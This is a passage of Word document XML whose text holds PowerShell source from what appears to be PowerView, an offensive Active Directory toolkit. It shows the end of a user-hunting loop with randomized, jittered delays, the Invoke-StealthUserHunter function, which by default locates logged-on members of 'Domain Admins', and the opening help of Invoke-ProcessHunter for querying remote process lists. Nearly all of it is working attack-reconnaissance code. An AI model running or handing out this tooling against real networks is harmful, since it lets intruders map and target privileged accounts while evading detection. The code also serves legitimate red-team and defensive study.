    <w:p w14:paraId="26D644FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0520EA23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Computer in $ComputerName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC306D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="06EA8D46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Counter = $Counter + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3A731E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="305F4B0C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # sleep for our semi-randomized interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CEDCA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F3F5F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E2F0161" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C54D67A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $TargetUsers, $CurrentUser, $Stealth, $DomainShortName, 0, 0, 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB50A6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D8DB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2111FC46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Result -and $StopOnSuccess) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A07C0CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    Write-Verbose "[*] Target user found, returning early"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267C5B3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC4A959" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A176AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57529F4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B5CEEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34D002EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0D6471" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD2FFD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="28ACDAAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A4E1251" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Invoke-StealthUserHunter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70215D61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0835AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FFBC76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0,ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EDBE74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('Hosts')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B03BD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF45675" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A5BEEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C99ECF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48240D3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostList')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C59F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB32D4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DD7FAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C77B2C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4711D568" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1234C649" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0DA78749" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFDA7CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141B4ABA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="760E80BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D8ADC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupName = 'Domain Admins',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7674D663" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B518434" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0149C2FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetServer,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CA46BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C08B0E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34777700" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661D16DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0502EA4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE2CFBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27481147" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="12CB8A31" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25813286" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687C0569" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78E878F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0975842F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5CBAA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C710EEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="685682EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E975FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CheckAccess,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C607E71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4CDFA7D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B36C76F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $StopOnSuccess,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8DCF7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E5D7993" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230DD8B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $NoPing,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653FB5ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58332FF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [UInt32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC33181" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $Delay = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614EEC7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2BD37451" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Double]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A221965" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Jitter = .3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39352CF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="480A70BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53941CA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741B7D77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DA93FC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4100B7BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ShowAll,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5395D6EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3663394F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A652B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchForest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1927D174" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="279B16C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C57649" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateSet("DFS","DC","File","All")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49578584" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $StealthSource ="All"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9FF3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB151F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # kick off Invoke-UserHunter with stealth options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A1B71C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Invoke-UserHunter -Stealth @PSBoundParameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FA933A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEEDAAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="45483168" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D9C47B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Invoke-ProcessHunter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F77DE4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6497C0AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC7C088" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0631FBC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Query the process lists of remote machines, searching for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469490A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        processes with a specific name or owned by a specific user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7E3993" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Thanks to @paulbrandau for the approach idea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21738D41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FEA9B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: @harmj0y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC1A6AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C24027A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C7FF50A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E837B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1EADE1A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host array to enumerate, passable on the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB5FD9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53CF29E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D867F45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3BCD4E70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        File of hostnames/IPs to search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E46E665" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="11018404" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02324055" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5CDABD2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host filter name to query AD for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E97EE9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35AA05A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A6D059" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5893BE85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3700EC81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397DD1D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2AE77800" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ProcessName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF36481" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70636DCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The name of the process to hunt, or a comma separated list of names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31780925" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6503A8C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586EE06A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="30A42198" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Group name to query for target users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A98AF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A44781A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TargetServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC03F88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D522630" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Hunt for users who are effective local admins on a target server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138FDAEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10CE879F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E35AA37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4BCFD673" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Specific username to search for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62C4C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B23FFAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F147393" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4EA2C58A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558111C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5393E68B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserADSpath</w:t>
      </w:r>
